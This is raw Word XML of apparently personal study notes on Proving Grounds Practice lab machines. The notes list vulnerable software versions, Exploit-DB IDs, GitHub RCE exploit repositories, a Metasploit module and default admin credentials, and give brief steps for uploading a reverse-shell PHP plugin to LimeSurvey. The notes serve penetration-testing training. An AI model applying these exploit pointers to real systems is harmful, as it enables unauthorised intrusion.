    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsive FileManager 9.13.4 (LFI for foothold) and openemr 5.0.1 (authentication for reverse shell) were both exploited in Apex PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1321">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more in-depth writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1322">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is short writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are the Responsive FileManager 9.13.4  exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1323">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (49359)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1324">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (45987)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The one used for openmr was exploitdb 45161 and they both downloaded from searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat/7.04 (Tomcat 7.0.4) was enumerated in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1325">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sorcerer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice and used to find ZIP files that had SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should look at other writeups too since the one I linked was short</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">htmly was enumerated in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1326">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice but nothing was useful there but it did teach us how to enumerate a little</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A24">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grav CMS (GravCMS) was exploited in Astronaut PG Practice. NO AUTHENTICATION NEEDED and they got rev shell from it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1327">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they used exploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1328">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49973</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1329">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they used exploitDB but it pointed to a metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1330">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49788</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1336"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The module was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/linux/http/gravcms_exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BoxBilling CMS (&lt;=4.22.1.5) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1331">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bullybox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. It was (CVE-2022-3552). It needed admin authentication beforehand. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the github exploit they used for RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1332">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/0xk4b1r/CVE-2022-3552</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1333">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other writeup tried the exploitDB one but it didn't work, so they used the same github one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LimeSurvey (we had version 5.3.24) was exploited with RCE in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1334">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Marketing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. But, the only thing is that we needed admin access, but it was just admin:password for the creds. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1335">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Y1LD1R1M-1337/Limesurvey-RCE?tab=readme-ov-file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have to make an XML file (included in github) and a rev.php and then zip it, and then upload as a plugin. Follow instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="718"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And ALSO, we were supposed to google "LimeSurvey" config file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/application/config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which then had </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/application/config/config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use those creds!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subrion 4.2.1 was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1336">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exfiltrated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. It needed authenticaation (which was just admin:admin) and then once you have authentication you can run the exploit which gives you RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1337">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49876</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
